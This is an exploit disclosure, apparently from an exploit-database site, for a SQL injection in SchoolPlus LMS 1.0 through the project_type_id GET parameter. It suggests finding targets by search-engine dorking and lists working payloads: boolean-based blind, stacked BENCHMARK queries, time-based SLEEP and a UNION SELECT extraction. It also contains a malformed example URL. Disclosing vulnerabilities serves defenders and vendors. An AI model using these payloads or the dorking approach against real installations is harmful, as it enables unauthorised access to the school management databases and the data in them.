Headline
SchoolPlus LMS 1.0 SQL Injection
SchoolPlus LMS version 1.0 suffers from a remote SQL injection vulnerability.
=============================================================================================================================================| # Title : SchoolPlus LMS v1.0 SQL injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) || # Vendor : http://webpay.com.np/#Product |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : index.php?project_type_id=1[+] https://www/127.0.0.1/demo/bccnorgnp/projects/index.php?project_type_id=1 <=== inject here[+] Parameter: project_type_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: project_type_id=1 AND 5604=5604 Type: stacked queries Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment) Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS) Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- ----Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================